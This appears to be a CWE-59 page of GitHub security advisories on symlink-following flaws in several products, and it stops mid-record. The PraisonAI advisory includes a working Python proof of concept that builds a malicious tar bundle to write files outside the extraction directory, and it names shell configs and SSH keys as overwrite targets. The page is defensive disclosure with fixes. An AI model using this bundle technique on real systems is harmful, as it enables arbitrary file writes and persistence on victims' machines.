CWE-59
AllowedImproper Link Resolution Before File Access ('Link Following')
Abstraction: Base · Status: Draft
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
1987 vulnerabilities reference this CWE, most recent first.
GHSA-9JW4-HXM9-MF52
Vulnerability from github – Published: 2024-06-11 18:30 – Updated: 2024-06-11 18:30Azure Monitor Agent Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2024-35254"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-11T17:16:03Z",
"severity": "HIGH"
},
"details": "Azure Monitor Agent Elevation of Privilege Vulnerability",
"id": "GHSA-9jw4-hxm9-mf52",
"modified": "2024-06-11T18:30:50Z",
"published": "2024-06-11T18:30:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35254"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-35254"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9MPH-4F7V-FMVH
Vulnerability from github – Published: 2026-03-04 19:02 – Updated: 2026-03-04 19:02Summary
A crafted local avatar path could follow a symlink outside the agent workspace and return arbitrary file contents as a base64 data: URL in gateway responses.
Impact
- Confidentiality impact: local file read in the gateway process context.
- Exfiltration path:
agents.listcan return the resultingavatarUrlpayload.
Affected Components
src/gateway/session-utils.ts(resolveIdentityAvatarUrl)
Affected Packages / Versions
- Package:
openclaw(npm) - Introduced:
v2026.1.21 - Affected published versions:
<= 2026.2.21-2 - Planned patched version:
2026.2.22
Remediation
- Resolve workspace and avatar paths with
realpathand enforce realpath containment. - Open files with
O_NOFOLLOWwhen available. - Compare pre-open and opened file identity (
dev/ino) to block swap races. - Add regression tests for outside-workspace symlink rejection and in-workspace symlink allowance.
Fix Commit(s)
3d0337504349954237d09e4d957df5cb844d5e77
OpenClaw thanks @aether-ai-agent for reporting.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.2.22"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-04T19:02:59Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\nA crafted local avatar path could follow a symlink outside the agent workspace and return arbitrary file contents as a base64 `data:` URL in gateway responses.\n\n## Impact\n- Confidentiality impact: local file read in the gateway process context.\n- Exfiltration path: `agents.list` can return the resulting `avatarUrl` payload.\n\n## Affected Components\n- `src/gateway/session-utils.ts` (`resolveIdentityAvatarUrl`)\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Introduced: `v2026.1.21`\n- Affected published versions: `\u003c= 2026.2.21-2`\n- Planned patched version: `2026.2.22`\n\n## Remediation\n- Resolve workspace and avatar paths with `realpath` and enforce realpath containment.\n- Open files with `O_NOFOLLOW` when available.\n- Compare pre-open and opened file identity (`dev`/`ino`) to block swap races.\n- Add regression tests for outside-workspace symlink rejection and in-workspace symlink allowance.\n\n## Fix Commit(s)\n- `3d0337504349954237d09e4d957df5cb844d5e77`\n\nOpenClaw thanks @aether-ai-agent for reporting.",
"id": "GHSA-9mph-4f7v-fmvh",
"modified": "2026-03-04T19:02:59Z",
"published": "2026-03-04T19:02:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9mph-4f7v-fmvh"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/3d0337504349954237d09e4d957df5cb844d5e77"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw has agent avatar symlink traversal in gateway session metadata"
}
GHSA-9P78-XGFP-85MW
Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-10-26 12:00A UNIX Symbolic Link (Symlink) Following vulnerability in python-HyperKitty of openSUSE Leap 15.2, Factory allows local attackers to escalate privileges from the user hyperkitty or hyperkitty-admin to root. This issue affects: openSUSE Leap 15.2 python-HyperKitty version 1.3.2-lp152.2.3.1 and prior versions. openSUSE Factory python-HyperKitty versions prior to 1.3.4-5.1.
{
"affected": [],
"aliases": [
"CVE-2021-25322"
],
"database_specific": {
"cwe_ids": [
"CWE-59",
"CWE-61"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-10T12:15:00Z",
"severity": "HIGH"
},
"details": "A UNIX Symbolic Link (Symlink) Following vulnerability in python-HyperKitty of openSUSE Leap 15.2, Factory allows local attackers to escalate privileges from the user hyperkitty or hyperkitty-admin to root. This issue affects: openSUSE Leap 15.2 python-HyperKitty version 1.3.2-lp152.2.3.1 and prior versions. openSUSE Factory python-HyperKitty versions prior to 1.3.4-5.1.",
"id": "GHSA-9p78-xgfp-85mw",
"modified": "2022-10-26T12:00:32Z",
"published": "2022-05-24T19:04:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25322"
},
{
"type": "WEB",
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1182373"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9P79-9G5P-R5V6
Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2022-05-13 01:32IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local db2 instance owner to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148803.
{
"affected": [],
"aliases": [
"CVE-2018-1780"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-11-09T01:29:00Z",
"severity": "HIGH"
},
"details": "IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local db2 instance owner to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148803.",
"id": "GHSA-9p79-9g5p-r5v6",
"modified": "2022-05-13T01:32:42Z",
"published": "2022-05-13T01:32:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1780"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148803"
},
{
"type": "WEB",
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10733939"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/105885"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1042086"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9PVV-PV37-92F4
Vulnerability from github – Published: 2022-05-13 01:23 – Updated: 2025-04-12 12:36The mountpoint_last function in fs/namei.c in the Linux kernel before 3.15.8 does not properly maintain a certain reference count during attempts to use the umount system call in conjunction with a symlink, which allows local users to cause a denial of service (memory consumption or use-after-free) or possibly have unspecified other impact via the umount program.
{
"affected": [],
"aliases": [
"CVE-2014-5045"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2014-08-01T11:13:00Z",
"severity": "MODERATE"
},
"details": "The mountpoint_last function in fs/namei.c in the Linux kernel before 3.15.8 does not properly maintain a certain reference count during attempts to use the umount system call in conjunction with a symlink, which allows local users to cause a denial of service (memory consumption or use-after-free) or possibly have unspecified other impact via the umount program.",
"id": "GHSA-9pvv-pv37-92f4",
"modified": "2025-04-12T12:36:17Z",
"published": "2022-05-13T01:23:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5045"
},
{
"type": "WEB",
"url": "https://github.com/torvalds/linux/commit/295dc39d941dc2ae53d5c170365af4c9d5c16212"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1122472"
},
{
"type": "WEB",
"url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=295dc39d941dc2ae53d5c170365af4c9d5c16212"
},
{
"type": "WEB",
"url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=295dc39d941dc2ae53d5c170365af4c9d5c16212"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2015-0062.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/60353"
},
{
"type": "WEB",
"url": "http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.15.8"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2014/07/24/2"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/68862"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9Q28-GHCR-C4X3
Vulnerability from github – Published: 2026-05-11 13:59 – Updated: 2026-05-11 13:59Summary
The _safe_extractall helper that all recipe pull, recipe publish, and recipe unpack flows route through validates each archive member's name for absolute paths, .. segments, and resolved-path escape — but does not validate member.linkname, does not reject symlink/hardlink members, and calls tar.extractall(dest_dir) without filter="data". A bundle that contains a symlink with a name
inside dest_dir but a linkname pointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapes dest_dir and lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem.
Affected paths
Every code path that calls _safe_extractall is exposed:
| Caller | File:line |
|---|---|
praisonai recipe unpack |
src/praisonai/praisonai/cli/features/recipe.py:1175 (introduced as the fix for GHSA-99g3-w8gr-x37c) |
LocalRegistry.unpack (recipe pull) |
src/praisonai/praisonai/recipe/registry.py:413 |
| Registry archive validation (publish) | src/praisonai/praisonai/recipe/registry.py:808 |
Root cause
recipe/registry.py:131-178:
def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
...
for member in tar.getmembers():
...
member_path = Path(member.name)
if member_path.is_absolute(): raise RegistryError(...)
if '..' in member_path.parts: raise RegistryError(...)
resolved = (dest_resolved / member_path).resolve()
if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:
raise RegistryError(...)
# All members validated — safe to extract
tar.extractall(dest_dir)
Three gaps:
- The loop checks only
member.name.member.linkname(the symlink / hardlink target) is not inspected. member.issym()andmember.islnk()are not used to refuse link members at all.tar.extractall(dest_dir)runs withoutfilter="data". On Python ≤ 3.13 the default isfully_trusted(with a DeprecationWarning on 3.12+), which permits symlinks pointing outsidedest_dir.
When the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker's chosen location.
Reproduction
Tested in a disposable container against praisonai==4.6.35 (pip install praisonai, no other modifications).
make_bundle.py:
import io, json, tarfile
manifest = json.dumps({"name": "legit", "version": "1.0.0"}).encode()
with tarfile.open("malicious.praison", "w:gz") as tar:
info = tarfile.TarInfo("manifest.json"); info.size = len(manifest)
tar.addfile(info, io.BytesIO(manifest))
sym = tarfile.TarInfo("legit/escape")
sym.type = tarfile.SYMTYPE
sym.linkname = "/tmp/PWNED"
tar.addfile(sym)
payload = b"PWNED via symlink-extraction bypass of _safe_extractall\n"
pf = tarfile.TarInfo("legit/escape/owned.txt"); pf.size = len(payload)
tar.addfile(pf, io.BytesIO(payload))
direct_test.py:
import shutil, tarfile
from pathlib import Path
from praisonai.recipe.registry import _safe_extractall
DEST = Path("/work/recipes_direct")
shutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True)
Path("/tmp/PWNED").mkdir(parents=True, exist_ok=True)
with tarfile.open("malicious.praison", "r:gz") as tar:
_safe_extractall(tar, DEST)
assert Path("/tmp/PWNED/owned.txt").exists(), "did not escape"
print("PWNED:", Path("/tmp/PWNED/owned.txt").read_text())
Run:
docker run --rm -v "$PWD:/work" -w /work python:3.11-slim sh -c '
pip install -q praisonai &&
python make_bundle.py &&
python direct_test.py
'
Observed output:
_safe_extractall returned cleanly
PWNED: PWNED via symlink-extraction bypass of _safe_extractall
/tmp/PWNED/owned.txt exists after the call returns, written outside the destination directory the helper was asked to extract into.
Impact
Arbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious .praison bundle through any of the three callers above.
Realistic exploitation paths:
- A user runs
praisonai recipe unpack ./<malicious>.praisonafter obtaining the bundle from a shared registry, a tutorial link, or direct messaging. - A user runs
praisonai recipe pull <name>against a malicious or compromised registry. - A registry server processes an uploaded
.praisonbundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).
Where the agent process runs as a regular user, the attacker can overwrite shell config (.bashrc, .zshrc, .profile), SSH authorized_keys, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and some sudo-launched workflows), the attacker controls arbitrary system files.
This re-opens the recipe pull, recipe publish, and recipe unpack paths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.
Suggested remediation
Single-line fix at recipe/registry.py:178:
tar.extractall(dest_dir, filter="data")
filter="data" (introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses
symlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class.
If you also support older Python, add an explicit guard inside the existing per-member loop before tar.extractall:
if member.issym() or member.islnk():
link_target = (dest_resolved / member_path.parent / member.linkname).resolve()
if member.linkname.startswith("/") or not str(link_target).startswith(str(dest_resolved) + os.sep):
raise RegistryError(
f"Refusing to extract link with target outside dest dir: "
f"{member.name} -> {member.linkname}"
)
Affected versions
praisonai >= 2.7.2 through current 4.6.35 (the helper exists at least back to the earliest path-traversal patch chain referenced in
GHSA-99g3-w8gr-x37c). All releases that route extraction through _safe_extractall are exposed.
Disclosure
Reported privately via the project's GHSA workflow at https://github.com/MervinPraison/PraisonAI/security/advisories/new
-- Dhiral Vyas
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.36"
},
"package": {
"ecosystem": "PyPI",
"name": "PraisonAI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.37"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44340"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-11T13:59:41Z",
"nvd_published_at": "2026-05-08T14:16:47Z",
"severity": "HIGH"
},
"details": "### Summary\nThe `_safe_extractall` helper that all `recipe pull`, `recipe publish`, and `recipe unpack` flows route through validates each archive member\u0027s `name` for absolute paths, `..` segments, and resolved-path escape \u2014 but does **not** validate `member.linkname`, does not reject symlink/hardlink members, and calls `tar.extractall(dest_dir)` without `filter=\"data\"`. A bundle that contains a symlink with a name\ninside `dest_dir` but a `linkname` pointing outside it, followed by a regular file whose path traverses *through* the just-created symlink, escapes `dest_dir` and lets the attacker write arbitrary content to an attacker-chosen location on the victim\u0027s filesystem.\n\n## Affected paths\n\nEvery code path that calls `_safe_extractall` is exposed:\n\n| Caller | File:line |\n|---|---|\n| `praisonai recipe unpack` | `src/praisonai/praisonai/cli/features/recipe.py:1175` (introduced as the fix for GHSA-99g3-w8gr-x37c) |\n| `LocalRegistry.unpack` (recipe pull) | `src/praisonai/praisonai/recipe/registry.py:413` |\n| Registry archive validation (publish) | `src/praisonai/praisonai/recipe/registry.py:808` |\n\n## Root cause\n\n`recipe/registry.py:131-178`:\n\n```python\ndef _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -\u003e None:\n ...\n for member in tar.getmembers():\n ...\n member_path = Path(member.name)\n if member_path.is_absolute(): raise RegistryError(...)\n if \u0027..\u0027 in member_path.parts: raise RegistryError(...)\n resolved = (dest_resolved / member_path).resolve()\n if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:\n raise RegistryError(...)\n # All members validated \u2014 safe to extract\n tar.extractall(dest_dir)\n```\n\nThree gaps:\n\n1. The loop checks only `member.name`. `member.linkname` (the symlink / hardlink target) is not inspected.\n2. `member.issym()` and `member.islnk()` are not used to refuse link members at all.\n3. `tar.extractall(dest_dir)` runs without `filter=\"data\"`. On Python \u2264 3.13 the default is `fully_trusted` (with a DeprecationWarning on 3.12+), which permits symlinks pointing outside `dest_dir`.\n\nWhen the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker\u0027s chosen location.\n\n## Reproduction\n\nTested in a disposable container against `praisonai==4.6.35` (`pip install praisonai`, no other modifications).\n\n`make_bundle.py`:\n\n```python\nimport io, json, tarfile\nmanifest = json.dumps({\"name\": \"legit\", \"version\": \"1.0.0\"}).encode()\nwith tarfile.open(\"malicious.praison\", \"w:gz\") as tar:\n info = tarfile.TarInfo(\"manifest.json\"); info.size = len(manifest)\n tar.addfile(info, io.BytesIO(manifest))\n\n sym = tarfile.TarInfo(\"legit/escape\")\n sym.type = tarfile.SYMTYPE\n sym.linkname = \"/tmp/PWNED\"\n tar.addfile(sym)\n\n payload = b\"PWNED via symlink-extraction bypass of _safe_extractall\\n\"\n pf = tarfile.TarInfo(\"legit/escape/owned.txt\"); pf.size = len(payload)\n tar.addfile(pf, io.BytesIO(payload))\n```\n\n`direct_test.py`:\n\n```python\nimport shutil, tarfile\nfrom pathlib import Path\nfrom praisonai.recipe.registry import _safe_extractall\n\nDEST = Path(\"/work/recipes_direct\")\nshutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True)\nPath(\"/tmp/PWNED\").mkdir(parents=True, exist_ok=True)\n\nwith tarfile.open(\"malicious.praison\", \"r:gz\") as tar:\n _safe_extractall(tar, DEST)\n\nassert Path(\"/tmp/PWNED/owned.txt\").exists(), \"did not escape\"\nprint(\"PWNED:\", Path(\"/tmp/PWNED/owned.txt\").read_text())\n```\n\nRun:\n\n```bash\ndocker run --rm -v \"$PWD:/work\" -w /work python:3.11-slim sh -c \u0027\n pip install -q praisonai \u0026\u0026\n python make_bundle.py \u0026\u0026\n python direct_test.py\n\u0027\n```\n\nObserved output:\n\n```\n_safe_extractall returned cleanly\nPWNED: PWNED via symlink-extraction bypass of _safe_extractall\n```\n\n`/tmp/PWNED/owned.txt` exists after the call returns, written outside the destination directory the helper was asked to extract into.\n\n## Impact\n\nArbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious `.praison` bundle through any of the three callers above.\n\nRealistic exploitation paths:\n\n- A user runs `praisonai recipe unpack ./\u003cmalicious\u003e.praison` after obtaining the bundle from a shared registry, a tutorial link, or\n direct messaging.\n- A user runs `praisonai recipe pull \u003cname\u003e` against a malicious or compromised registry.\n- A registry server processes an uploaded `.praison` bundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).\n\nWhere the agent process runs as a regular user, the attacker can overwrite shell config (`.bashrc`, `.zshrc`, `.profile`), SSH `authorized_keys`, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and some `sudo`-launched workflows), the attacker controls arbitrary system files.\n\nThis re-opens the `recipe pull`, `recipe publish`, and `recipe unpack` paths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.\n\n## Suggested remediation\n\nSingle-line fix at `recipe/registry.py:178`:\n\n```python\ntar.extractall(dest_dir, filter=\"data\")\n```\n\n`filter=\"data\"` (introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses\nsymlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class.\nIf you also support older Python, add an explicit guard inside the existing per-member loop before `tar.extractall`:\n\n```python\nif member.issym() or member.islnk():\n link_target = (dest_resolved / member_path.parent / member.linkname).resolve()\n if member.linkname.startswith(\"/\") or not str(link_target).startswith(str(dest_resolved) + os.sep):\n raise RegistryError(\n f\"Refusing to extract link with target outside dest dir: \"\n f\"{member.name} -\u003e {member.linkname}\"\n )\n```\n\n## Affected versions\n\n`praisonai \u003e= 2.7.2` through current `4.6.35` (the helper exists at least back to the earliest path-traversal patch chain referenced in\nGHSA-99g3-w8gr-x37c). All releases that route extraction through `_safe_extractall` are exposed.\n\n## Disclosure\n\nReported privately via the project\u0027s GHSA workflow at\nhttps://github.com/MervinPraison/PraisonAI/security/advisories/new\n\n-- Dhiral Vyas",
"id": "GHSA-9q28-ghcr-c4x3",
"modified": "2026-05-11T13:59:41Z",
"published": "2026-05-11T13:59:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9q28-ghcr-c4x3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44340"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "PraisonAI\u0027s symlink-extraction bypass of `_safe_extractall` writes outside `dest_dir`"
}
GHSA-9QWX-J72C-6HR4
Vulnerability from github – Published: 2022-05-13 01:13 – Updated: 2025-04-11 03:43FUSE, possibly 2.8.5 and earlier, allows local users to create mtab entries with arbitrary pathnames, and consequently unmount any filesystem, via a symlink attack on the parent directory of the mountpoint of a FUSE filesystem, a different vulnerability than CVE-2010-0789.
{
"affected": [],
"aliases": [
"CVE-2010-3879"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2011-01-22T22:00:00Z",
"severity": "MODERATE"
},
"details": "FUSE, possibly 2.8.5 and earlier, allows local users to create mtab entries with arbitrary pathnames, and consequently unmount any filesystem, via a symlink attack on the parent directory of the mountpoint of a FUSE filesystem, a different vulnerability than CVE-2010-0789.",
"id": "GHSA-9qwx-j72c-6hr4",
"modified": "2025-04-11T03:43:19Z",
"published": "2022-05-13T01:13:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3879"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/bugs/670622"
},
{
"type": "WEB",
"url": "https://bugzilla.novell.com/show_bug.cgi?id=651598"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=651183"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62986"
},
{
"type": "WEB",
"url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=602333"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053792.html"
},
{
"type": "WEB",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077247.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2011-04/msg00000.html"
},
{
"type": "WEB",
"url": "http://openwall.com/lists/oss-security/2010/11/04/8"
},
{
"type": "WEB",
"url": "http://openwall.com/lists/oss-security/2010/11/05/2"
},
{
"type": "WEB",
"url": "http://osvdb.org/70520"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/42961"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/42965"
},
{
"type": "WEB",
"url": "http://www.halfdog.net/Security/FuseTimerace"
},
{
"type": "WEB",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:155"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/44623"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-1045-1"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-1045-2"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2011/0181"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2011/0302"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9R2W-394V-53QC
Vulnerability from github – Published: 2021-08-31 16:05 – Updated: 2021-08-31 16:01Impact
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.
This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both \ and / characters as path separators, however \ is a valid filename character on posix systems.
By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.
Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at FOO, followed by a symbolic link named foo, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but not from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the FOO directory would then be placed in the target of the symbolic link, thinking that the directory had already been created.
These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.
The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. If this is not possible, a workaround is available below.
Patches
4.4.16 || 5.0.8 || 6.1.7
Workarounds
Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.
const tar = require('tar')
tar.x({
file: 'archive.tgz',
filter: (file, entry) => {
if (entry.type === 'SymbolicLink') {
return false
} else {
return true
}
}
})
Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.
Fix
The problem is addressed in the following ways:
- All paths are normalized to use
/as a path separator, replacing\with/on Windows systems, and leaving\intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed. - Directory cache pruning is performed case-insensitively. This may result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.
Caveat
Note that this means that the entry objects exposed in various parts of tar's API will now always use / as a path separator, even on Windows systems. This is not expected to cause problems, as / is a valid path separator on Windows systems, but may result in issues if entry.path is compared against a path string coming from some other API such as fs.realpath() or path.resolve().
Users are encouraged to always normalize paths using a well-tested method such as path.resolve() before comparing paths to one another.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "tar"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "4.4.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "tar"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.0.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "tar"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-37701"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-31T16:01:50Z",
"nvd_published_at": "2021-08-31T17:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\n\nThis logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators, however `\\` is a valid filename character on posix systems.\n\nBy first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\n\nAdditionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. \n\nThese issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.\n\nThe v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.\n\n### Patches\n\n4.4.16 || 5.0.8 || 6.1.7\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.\n\n```js\nconst tar = require(\u0027tar\u0027)\n\ntar.x({\n file: \u0027archive.tgz\u0027,\n filter: (file, entry) =\u003e {\n if (entry.type === \u0027SymbolicLink\u0027) {\n return false\n } else {\n return true\n }\n }\n})\n```\n\nUsers are encouraged to upgrade to the latest patched versions, rather than 